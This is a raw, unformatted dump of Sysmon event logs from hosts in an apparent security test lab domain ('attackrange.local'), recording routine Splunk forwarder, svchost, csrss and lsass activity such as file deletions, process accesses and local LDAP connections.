AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.479{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EEE5123B259C9226DBEB118769C6800,SHA256=C8FE3A676CC857DE79FB9F0C49B81208EF288EBADA38CE6D416241D877D57F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081262Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:58.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07048FD64589D978802DBD3FD531A1A0,SHA256=A27D8AA902BA49D196D4E944A994A930F90455617EC2B3588DB23D20961E927F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.246{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49516-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.246{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49516-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000103350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.823{58E9C193-B227-615A-C401-00000000FC01}70965920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B227-615A-C401-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B227-615A-C401-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B227-615A-C401-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.589{58E9C193-B227-615A-C401-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.510{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B842E886097F9B74B83610105692F9,SHA256=C46D731AC9B57E41FD856137C88925225099C29AB2B4A0A156CE612A1446C5E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081276Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B227-615A-4101-00000000FD01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081275Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081274Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081273Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081272Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081271Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081270Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081269Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081268Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081267Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081266Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B227-615A-4101-00000000FD01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081265Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.119{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B227-615A-4101-00000000FD01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081264Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.120{2FDD8D40-B227-615A-4101-00000000FD01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081263Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:59.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C38E77C4EC4FD3827D6539E17438B07,SHA256=02527A248796AF66395E4336939F558ACBC73242CF78BC82F2F9F7644ED6B795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87619313F135AC84E0A5503AFA65F1A7,SHA256=242A3ED4F7851B592E7D38BCFE3C2D60B4BE34782B143EE77E651A6966F7F1F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:59.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F1042BB1CB947E0F6CE5C8DEFBD2483,SHA256=DD70ED7F19AAAF25F208AA080FCC7216C09A22B6F854B679B2427D4E1E4FFD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.714{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87619313F135AC84E0A5503AFA65F1A7,SHA256=242A3ED4F7851B592E7D38BCFE3C2D60B4BE34782B143EE77E651A6966F7F1F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.511{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 